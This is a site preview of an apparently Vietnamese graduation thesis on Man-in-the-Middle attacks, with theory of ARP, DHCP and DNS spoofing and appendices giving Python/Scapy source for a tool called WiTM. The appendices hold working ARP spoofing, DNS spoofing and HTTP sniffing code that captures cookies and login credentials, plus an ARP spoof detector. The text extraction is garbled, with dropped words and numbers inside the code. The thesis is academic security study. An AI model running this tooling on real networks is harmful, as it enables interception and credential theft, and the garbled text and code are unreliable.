1. Trang chủ
  2. » Luận Văn - Báo Cáo

Báo cáo đồ án tốt nghiệp phân tích và đánh giá tấn công MITM đánh giá an toàn mạng 2022

94 12 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

ii LỜI MỞ ĐẦU Hiện nay, trong thời đại công nghiệp 4 0 đang phát triển mạnh mẽ, các công ty công nghệ đang tìm kiếm và phát triển các thiết bị IoT, công nghệ, giao thức mới nhằm nâng cao đời sống xã h.

LỜI MỞ ĐẦU Hiện nay, thời đại công nghiệp 4.0 phát triển mạnh mẽ, công ty công nghệ tìm kiếm phát triển thiết bị IoT, công nghệ, giao thức nhằm nâng cao đời sống xã hội lên tầm cao Tuy nhiên, phát triển nhanh vượt trội công nghệ thơng tin, chế an tồn bảo mật khơng thể bắt kịp tốc độ đó, khiến cho dễ bị nhắm đến công mạng sử dụng thiết bị Ảnh hưởng cơng mạng lớn, tùy theo mức độ quan trọng giá trị tài sản mục tiêu Các cơng mạng xảy đâu, kể mạng nội ta sử dụng Trong mạng nội LAN, kẻ cơng sử dụng nhiều phương pháp khác nhằm đánh cắp thông tin cá nhân, thông tin đăng nhập, tài liệu quan trọng, … người dùng bị nhắm đến Một phương pháp cơng hay sử dụng, cơng người xen hay cịn gọi công Man–in–The–Middle Để bảo vệ trước công Man-in-the-middle, nhiều công cụ kiểm thử xây dựng để mô công phát lỗ hổng mạng máy tính, phục vụ cho việc thiết kế chế phát bảo mật mạng cần thiết trước kiểu công Tuy nhiên, nhiều công cụ công chưa thực nhiều phương thức công hay kỹ thuật cơng chưa hồn thiện Ví dụ, cơng cụ công Ettercap công cụ công Man-in-TheMiddle lâu đời thông tin đọc giới hạn tên đăng nhập mật Vậy, việc phát triển cơng cụ cơng Man-in-The-Middle cịn nhiều tiềm để thêm vào phương thức hay cải thiện kỹ thuật có Chính lý này, đề tài chọn xây dựng đồ án “Xây dựng công cụ công Man-In-The-Middle phục vụ đánh giá an toàn mạng” với mục tiêu là:  Giới thiệu cơng Man-in-the-middle tìm hiểu phương thức kỹ thuật công Man-in-the-middle sử dụng  Phân tích, thiết kế lập trình cơng cụ cơng MiTM  Thử nghiệm cơng cụ cơng MiTM  Tìm hiểu cách phịng chống phát cơng MiTM Sau thời gian nghiên cứu đồ án, mục tiêu đề đạt Tuy nhiên, kiến thức kỹ lập trình cịn hạn chế nên khơng thể tránh khỏi thiếu sót, nên mong thầy bạn học viên đóng góp ý kiến để tác giả đồ án hồn thiện đề tài MỤC LỤC LỜI CẢM ƠN i LỜI MỞ ĐẦU ii DANH MỤC KÝ HIỆU VÀ TỪ VIẾT TẮT .vi DANH MỤC HÌNH ẢNH vii Chương 1: Tìm hiểu cơng Man – in – The – Middle (MiTM) 1.1 Khái niệm công 1.2 Các phương pháp thực công Man – in – The – Middle (MiTM) .3 1.2.1 ARP Spoofing 1.2.2 DHCP Spoofing .7 1.2.3 DNS Cache Poisoning 12 1.2.4 ICMP Redirect .15 1.3 Các hình thức cơng Man – in – the – middle 18 1.3.1 Packet Injection and Modification (Thêm thay đổi gói tin) 18 1.3.2 Session Hijacking (Chiếm đoạt phiên) 19 1.3.3 SSL Stripping 21 Chương 2: Xây dựng công cụ công MiTM 23 2.1 Giới thiệu .23 2.1.1 Scapy 23 2.1.2 Giới thiệu công cụ xây dựng 25 2.2 Phân tích thiết kế chức 26 2.2.1 Quét mạng (Network Scanner) 26 2.2.2 Tấn công ARP Spoofing 29 2.2.3 Phát ARP Spoofing (ARP Spoofing detector) 34 2.2.4 Lắng nghe HTTP (HTTP Sniffer) 39 2.2.5 DNS Spoofing 42 2.2.6 Trợ giúp 47 Chương 3: Thử nghiệm đánh giá an toàn mạng .48 3.1 Chuẩn bị .48 3.1.1 Hướng dẫn cài đặt công cụ 48 3.1.2 Thiết lập mơ hình thử nghiệm 48 3.2 Thử nghiệm đánh giá an toàn mạng .51 3.2.1 Khái niệm đánh giá an toàn mạng .51 3.2.2 Quét mạng (Network Scanner) 52 3.2.3 ARP Spoofing 53 3.2.4 Nghe đường truyền HTTP (HTTP Sniffer) 56 3.2.5 DNS Spoofing 58 3.2.6 Kết đánh giá an toàn mạng 60 Chương 4: Phòng chống phát công Man–in–the–Middle 61 4.1 Một số biện pháp phịng chống phát cơng MiTM .61 4.2 Sử dụng công cụ WiTM .63 KẾT LUẬN 66 TÀI LIỆU THAM KHẢO 67 Phụ lục 1: Chương trình cơng cụ (WiTM.py) 68 Phụ lục 2: Script chứa hàm kiểm tra trước (precheck.py) 71 Phụ lục 3: Script chứa chức quét mạng (network_scanner.py) 73 Phụ lục 4: Script chứa chức công ARP Spoofing phát ARP Spoofing (ARP_spoofing.py) .74 Phụ lục 5: Script chứa chức nghe đường truyền HTTP (packet_sniffer.py) 77 Phụ lục 6: Script chứa chức công DNS Spoofing (DNS_spoof.py) 79 Phụ lục 7: Script hướng dẫn sử dụng (help.py) 81 DANH MỤC KÝ HIỆU VÀ TỪ VIẾT TẮT ARP DHCP DNS HSTS HTTP ICMP IDS IP LAN MAC MiTM NAT NIC NSA OSI PC SSL TCP TTL UDP URL VLAN VoIP VPN WEP WiTM Address Resolution Protocol Dynamic Host Configuration Protocol Domain Name System HTTP Strict Transport Security Hypertext Transfer Protocol Internet Control Message Protocol Intrusion Detection System Internet Protocol Local Area Network Media Access Control Man-in-The-Middle Network Address Translation Network Interface Card National Security Agency Open Systems Interconnection Personal Computer Secure Socket Layer Transmission Control Protocol Time To Live User Datagram Protocol Uniform Resource Locator Virtual LAN Voice over IP Virtual Private Network Wired Equivalent Privacy Who in The Middle DANH MỤC HÌNH ẢNH Hình 1.1 Ví dụ minh họa cơng MiTM Hình 1.2 Hoạt động mạng thông thường Hình 1.3 Cách thực công ARP Spoofing kẻ công Hình 1.4 Hoạt động mạng sau bị cơng ARP Spoofing Hình 1.5 Quá trình hoạt động giao thức DHCP .8 Hình 1.6 Tấn cơng DHCP Starvation 10 Hình 1.7 Tấn cơng DHCP Spoofing 11 Hình 1.8 Tấn cơng DNS Cache Poisoning 13 Hình 1.9 Tấn cơng ICMP Redirect 17 Hình 1.10 Tấn cơng DNS Spoofing sử dụng kỹ thuật sửa đổi gói tin 18 Hình 1.11 Tấn cơng Session Hijacking 20 Hình 1.12 Tấn công SSL Stripping .21 Hình 2.1 Lưu đồ mơ tả hoạt động chức quét mạng .27 Hình 2.2 Lưu đồ mơ tả hoạt động chức cơng ARP Spoofing 30 Hình 2.3 Lưu đồ xử lý liệu nhập vào lắng nghe đường truyền chức phát ARP Spoofing 35 Hình 2.4 Lưu đồ xử lý gói tin ARP phát cơng ARP Spoofing 36 Hình 2.5 Lưu đồ mô tả hoạt động lắng nghe chức HTTP Sniffer 39 Hình 2.6 Lưu đồ xử lý liệu đầu vào chặn bắt gói tin chức DNS Spoofing 42 Hình 2.7 Lưu đồ mơ tả cách xử lý gói tin DNS Response chức DNS Spoofing 43 Hình 3.1 Giao diện cơng cụ WiTM .48 Hình 3.2 Mơ hình mạng thử nghiệm .49 Hình 3.3 Cửa sổ Virtual Network Editor VMWare Workstation 50 Hình 3.4 Cửa số NAT Settings VMWare Workstation 50 Hình 3.5 Chức Network Scanner chọn 52 Hình 3.6 Kết sau quét chức Network Scanner 53 Hình 3.7 Địa MAC máy nạn nhân Windows 53 Hình 3.8 Chức ARP Spoofing chọn 54 Hình 3.9 Tấn cơng ARP Spoofing thực .54 Hình 3.10 Bảng ARP máy nạn nhân bị cơng ARP Spoofing 55 Hình 3.11 Tấn công ARP Spoofing bị ngừng 55 Hình 3.12 Chức HTTP Sniffer chọn 56 Hình 3.13 Giao diện Website học viện Kỹ thuật Mật mã .56 Hình 3.14 Kết thu người dùng vào trang web 57 Hình 3.15 Giao diện trang web có URL http://testphp.vulnweb.com/login.php 57 Hình 3.16 Kêt thu người dùng đăng nhập vào trang web .58 Hình 3.17 Chức DNS Spoofing chọn 59 Hình 3.18 Tấn cơng DNS Spoofing thực .59 Hình 3.19 Kết nslookup máy nạn nhân với tên miền facebook.com 59 Hình 3.20 Kết nslookup máy nạn nhân với tên miền microsoft.com 60 Hình 3.21 Giao diện chức DNS Spoofing trình cơng 60 Hình 4.1 Chức phát cơng ARP Spoofing lựa chọn 64 Hình 4.2 Thực công ARP Spoofing máy nạn nhân 65 Hình 4.3 Kết chức phát công ARP Spoofing công cụ WiTM 65 CHƯƠNG I: TÌM HIỂU VỀ TẤN CƠNG MITM I.1 Khái niệm công Man – in – the – middle dạng cơng mà kẻ cơng xâm nhập vào hội thoại hai nhóm người, giả danh hai nhóm người truy cập vào thông tin mà hai bên truyền cho Tấn công man – in – the – middle cho phép kẻ công chặn, gửi nhận liệu dành cho người khác không gửi đi, mà hai bên không hay biết Tấn công MiTM kiểu công mạng lâu đời lịch sử an ninh mạng Đầu năm 1980 giờ, nhà khoa học máy tính phải nghiên cứu cách ngăn chặn nhân tố đe dọa sử dụng để nghe phá hoại đường truyền Để thực kiểu cơng này, kẻ cơng can thiệp vào đường truyền hợp pháp tạo điểm kết nối giả mà kẻ cơng kiểm sốt Đường truyền sau bị can thiệp bị loại bỏ mã hóa nhằm đánh cắp, thay đổi chuyển hướng đường truyền đến địa điểm mà kẻ công muốn chuyển đến Hình 1.1 Ví dụ minh họa cơng MiTM Hình 1.1 ví dụ cơng MiTM làm xâm nhập thành công Lúc này, kẻ công Peter xâm nhập vào trò chuyện Jack Jill cách đóng giả Jack Jill Tại đây, Jack, Peter Jill Jill, Peter Jack Khi đó, Jack Jill nghĩ họ nói chuyện trực tiếp với thực ra, họ nói chuyện với Peter Vì lý này, Peter lắng nghe liệu mà Jack Jill gửi đến cho Peter thay đổi thơng tin truyền Trong ví dụ, Jack Jill thực giao dịch chuyển tiền Peter thực cơng MiTM thay khóa Jill khóa mình, gửi cho Jack Sau đó, Peter chỉnh sửa số tài khoản Jack tài khoản để Jill chuyển số tiền vốn định gửi cho Jack vào tài khoản Các cơng MiTM ngày gia tăng, khó phát có xu hướng phát triển để phá biện pháp bảo mật Một số công MiTM gây ảnh hưởng lớn ghi nhận:  Năm 2011, lỗ hổng an ninh quan cấp chứng thư Hà Lan khai thác để cung cấp chứng thư giả mạo Các chứng thư giả mạo sau sử dụng để thực công MiTM  Việc quan an ninh quốc gia (NSA) Mỹ giả mạo thành Google làm sáng tỏ vào năm 2013 Edward Snowden làm rò rỉ tài liệu NSA công khai Sử dụng khả chặn bắt thông tin giả mạo chứng SSL, NSA theo dõi tìm kiếm tiềm tang người dùng  Năm 2014, Lenovo cài đặt phần mềm adware MiTM gọi Superfish máy tính PC Windows Superfish sử dụng để quét đường truyền SSL cài đặt chứng cho phép chúng chặn bắt chuyển hướng đường truyền an toàn  Năm 2015, cặp đôi người Anh 340.000 Euro công MiTM nghe email cướp email  Cuối tháng 4, năm 2019, nhiều nhà nghiên cứu tin nhiều kẻ công cố gắng sử dụng kiểu công Man – in – the – Middle để phân phối cài đặt Plead Backdoor cách sử dụng phần mềm AsusWSPanel.exe I.2 Các phương pháp thực công Man – in – The – Middle (MiTM) I.2.1 ARP Spoofing I.2.1.1 Giới thiệu giao thức ARP Trong hệ thống mạng máy tính, có địa gán cho máy tính là:  Địa logic: địa giao thức mạng IP, IPX, Loại địa mang tính chất tương đối, thay đổi theo cần thiết người dùng Các địa thường phân thành phần riêng biệt phần địa mạng phần địa máy Cách đánh địa nhắm giúp cho việc tìm đường kết nối từ hệ thống mạng sang hệ thống mạng khác dễ dàng  Địa vật lý: hay gọi địa MAC địa 48 bit, dùng để định danh nhà cung cấp gán cho thiết bị Đây loại địa phẳng, không phân lớp, nên khó dùng để định tuyến Trên thực tế, card mạng (NIC) kết nối với theo địa MAC, địa cố định phần cứng Do phải có chế để ánh xạ địa logic - lớp sang địa vật lý - lớp để thiết bị giao tiếp với Từ đó, giao thức phân giải địa ARP - Address Resolution Protocol tạo nhằm giải vấn đề Giao thức ARP (Address Resolution Protocol), giao thức sử dụng để phân giải địa MAC cố định từ địa IP, thay đổi tùy theo mạng ARP giao thức lớp - Data link layer mơ hình OSI giao thức lớp Link layer mơ hình TCP/IP Ban đầu ARP sử dụng mạng Ethernet để phân giải địa IP địa MAC Nhưng ngày ARP ứng dụng rộng rãi dùng công nghệ khác dựa lớp hai Quá trình hoạt động giao thức ARP sau:  Bước 1: Khi thiết bị nguồn muốn liên lạc với thiết bị khác, thiết bị kiểm tra xem đệm ARP máy có địa MAC PHỤ LỤC 3: Script chứa chức quét mạng (network_scanner.py) #!/usr/bin/env python from precheck import network_check import scapy.all as scapy def input_network(): while True: try: network_IP = str(raw_input("[*] Please input network IP you want to scan: ")) if network_check(network_IP): return network_IP else: print("[!] Invalid Input!") continue except KeyboardInterrupt: return "" break def send_ARP_broadcast(ip): ARP_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") arp_broadcast = broadcast/ARP_request answered_list = scapy.srp(arp_broadcast, verbose=False, timeout=5)[0] return answered_list def scan_network(ip): print("[!] Scanning network ") answered_list1 = send_ARP_broadcast(ip) discovered_list = [] for element in answered_list1: discovered_host = {"IP":element[1].psrc, "MAC":element[1].hwsrc} discovered_list.append(discovered_host) print(" -Result ") print("\tIP address \t\t\t MAC address") num = for element in discovered_list: print(element['IP'] + "\t\t\t|\t" + element['MAC']) num = num + print("[!] Return " + str(num) + " results!") print("[!] Gateway: " + scapy.conf.route.route("0.0.0.0")[2]) 73 PHỤ LỤC 4: Script chứa chức công ARP Spoofing phát ARP Spoofing (ARP_spoofing.py) #!/usr/bin/env python import scapy.all as scapy import sys import time import subprocess import re from precheck import ipaddr_check, interface_check from network_scanner import send_ARP_broadcast def ARP_spoof(target, spoof, target_MAC): spoof_packet = scapy.ARP(op=2, pdst=target, hwdst=target_MAC, psrc=spoof) scapy.send(spoof_packet, verbose=False) def ARP_restore(target, spoof, target_MAC, spoof_MAC): restore_packet = scapy.ARP(op=2, pdst=target, hwdst=target_MAC, psrc=spoof, hwsrc=spoof_MAC) scapy.send(restore_packet, verbose=False) def get_MAC(ip): answered_list=send_ARP_broadcast(ip) return answered_list[0][1].hwsrc def get_current_MAC(interface): command_output = subprocess.check_output(["ifconfig", interface]) mac_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", str(command_output)) if mac_result.group(0): return mac_result.group(0) else: print("[-] Error! Can't find your MAC address!") def ARP_sniffer(): global current_MAC current_MAC = "" while True: try: interface = str(raw_input("[*] Interface: ")) if interface_check(interface): current_MAC = get_current_MAC(interface) print("[!] ARP Spoofing detector running Press Ctrl + C to stop!") 74 scapy.sniff(iface=interface, store=False, prn=spoof_detector) else: print("[!] Unknown interface! Please try again ") continue except KeyboardInterrupt: print("\n[!] Exitting ") break def spoof_detector(packet): try: if packet.haslayer(scapy.ARP) and packet[scapy.ARP].hwsrc ! = current_MAC: sender_mac = packet[scapy.ARP].hwsrc src_mac = packet[scapy.Ether].src sender_ip = packet[scapy.ARP].psrc if sender_mac != src_mac: print("[!] Attack occured!") print("[+] Attacker's MAC: " + sender_mac + "\tSpoofed IP: " + sender_ip) else: icmp = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")/scapy.IP(dst=sender_ip)/sca py.ICMP() answered_list = scapy.srp(icmp, verbose=False, timeout=0.5)[0] real_mac = answered_list[0][1].src if sender_mac != real_mac: print("[!] Attack occured!") print("[+] Attacker's MAC: " + sender_mac + "\tSpoofed IP: " + sender_ip) except Exception as e: pass def ARPspoof_input(): while True: try: target_IP = str(raw_input("[*] Input target IP address: ")) spoof_IP = str(raw_input("[*] Input spoof IP target: ")) if ipaddr_check(target_IP) == False or ipaddr_check(spoof_IP) == False: print("[!] Invalid input! Please enter again ") continue else: print("[!] All input valid!") return target_IP, spoof_IP except KeyboardInterrupt: return "" 75 break def ARP_spoofing(stop, target_IP, spoof_IP): target_MAC = get_MAC(target_IP) spoof_MAC = get_MAC(spoof_IP) while True: ARP_spoof(target_IP, spoof_IP, target_MAC) ARP_spoof(spoof_IP, target_IP, spoof_MAC) time.sleep(5) if stop(): ARP_restore(target_IP, spoof_IP, target_MAC, spoof_MAC) ARP_restore(spoof_IP, target_IP, spoof_MAC, target_MAC) print("[!] Current ARP spoofing attack has stopped") break 76 PHỤ LỤC 5: Script chứa chức nghe đường truyền HTTP (packet_sniffer.py) #!/usr/bin/env python import scapy.all as scapy from scapy_http import http from precheck import interface_check from termcolor import colored def http_sniff(interface): scapy.sniff(iface=interface, store=False, prn=packet_processor) def process_url(packet): url = packet[http.HTTPRequest].Host.decode() + packet[http.HTTPRequest].Path.decode() if "Login" in url or "login" in url: print(colored("[ URL ] Located login page item: " + url, 'green')) else: print(colored("[ URL ] " + url, 'blue')) def process_cookie(packet): keywords = ["signin", "s_id", "login", "sessionid", "user"] captured_cookie = str(packet[http.HTTPRequest].Cookie) if captured_cookie != "None": cookie_list = captured_cookie.split(";") for item in cookie_list: for key in keywords: cookie_name = item.split("=")[0] if key in cookie_name.lower(): print(colored("[COOKIE] Important cookie: " + item, 'green')) break; else: continue print(colored("[COOKIE] " + item, 'yellow')) def get_login_info(packet): load = packet[scapy.Raw].load keywords = ["usr", "user", "username", "key", "pass", "passwrd", "password", "info"] for key in keywords: if key in load: return load def packet_processor(packet): 77 if packet.haslayer(http.HTTPRequest): print("\n### " + packet[scapy.IP].src + "###") process_url(packet) process_cookie(packet) if packet.haslayer(scapy.Raw): login_info = get_login_info(packet) if login_info: print(colored("\n[!] Possible login info: " + login_info + "\n", 'red')) def start(): while True: try: interface = raw_input("[*] Input interface used for sniff: ") if interface_check(interface): http_sniff(interface) else: print("[!] Unknown interface! Please try again !") continue except KeyboardInterrupt: print("\n[!] Exitting !") break; 78 PHỤ LỤC 6: Script chứa chức công DNS Spoofing (DNS_spoof.py) #!/usr/bin/env python import scapy.all as scapy from scapy_http import http import os import netfilterqueue from precheck import ipaddr_check def input_list(): global domain_ip_list domain_ip_list = [] while True: try: try: input_string = str(raw_input("[*] Input domain/IP pairs: ")) pair_list = input_string.split(";") except Exception as e: print("[!] Error! " + str(e)) continue for element in pair_list: pair = element.split("/") if ipaddr_check(pair[1]): domain_ip = {"Domain":pair[0], "IP":pair[1]} domain_ip_list.append(domain_ip) print("[+] Domain: " + pair[0] + "\t\tIP: " + pair[1]) else: print("[!] Error at pair " + element) return domain_ip_list except KeyboardInterrupt: print("\n[!] No input!") break return "" def dns_spoofer(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): req_name = scapy_packet[scapy.DNSQR].qname for element in domain_ip_list: if element["Domain"] in req_name: print("[+] Spoofing target: " + req_name) 79 answer = scapy.DNSRR(rrname=req_name, rdata=element["IP"]) scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = del del del del scapy_packet[scapy.IP].len scapy_packet[scapy.IP].chksum scapy_packet[scapy.UDP].len scapy_packet[scapy.UDP].chksum packet.set_payload(str(scapy_packet)) if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(http.HTTPRequest): print(scapy_packet[scapy.Raw].load) packet.accept() def DNS_spoofing(): try: output = input_list() if output != "": queue = netfilterqueue.NetfilterQueue() os.system('iptables -I FORWARD -j NFQUEUE queue-num 0') queue.bind(0, dns_spoofer) print("[!] DNS Spoofing attack running ") queue.run() except KeyboardInterrupt: print("\n[!] DNS Spoofing attack ended!") queue.unbind() os.system('iptables -D FORWARD -j NFQUEUE queue-num 0') 80 PHỤ LỤC 7: Script hướng dẫn sử dụng (help.py) #!/usr/bin/env python def option_help(): print("\n\t\t\tTool name: Who in The Middle (WiTM)\n\t\tThis tool provide some function you need to execute a MiTM attack Enjoy!\n") print("[1]\tActivate Network Scanner.\n\tScanning local network based on user input.\n") print("[2]\tExecute ARP spoofing attack.\n\tPress again to stop ARP spoofing attack.\n") print("[3]\tActivate ARP Spoofing detector.\n\tNote: This function can only detect ARP spoofing attack that targeted this device only.\n") print("[4]\tActivate HTTP sniffer.\n\tThis function can gather URLs, COOKIE and possible login info.\n") print("[5]\tExecute DNS Spoofing attack.\n\tNote: This attack can only be used when you have successfully become man in the middle!\n") print("[6]\tHelp\n") print("[0]\tExit\n") 81 82 83 84 85 ... nghiệm đánh giá an toàn mạng .48 3.1 Chuẩn bị .48 3.1.1 Hướng dẫn cài đặt công cụ 48 3.1.2 Thiết lập mơ hình thử nghiệm 48 3.2 Thử nghiệm đánh giá an toàn mạng. .. 58 3.2.6 Kết đánh giá an toàn mạng 60 Chương 4: Phòng chống phát công Man–in–the–Middle 61 4.1 Một số biện pháp phịng chống phát cơng MiTM .61 4.2 Sử dụng công cụ WiTM ... đường truyền an toàn  Năm 2015, cặp đôi người Anh 340.000 Euro công MiTM nghe email cướp email  Cuối tháng 4, năm 2019, nhiều nhà nghiên cứu tin nhiều kẻ công cố gắng sử dụng kiểu công Man – in

Ngày đăng: 04/08/2022, 23:37

Xem thêm:

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w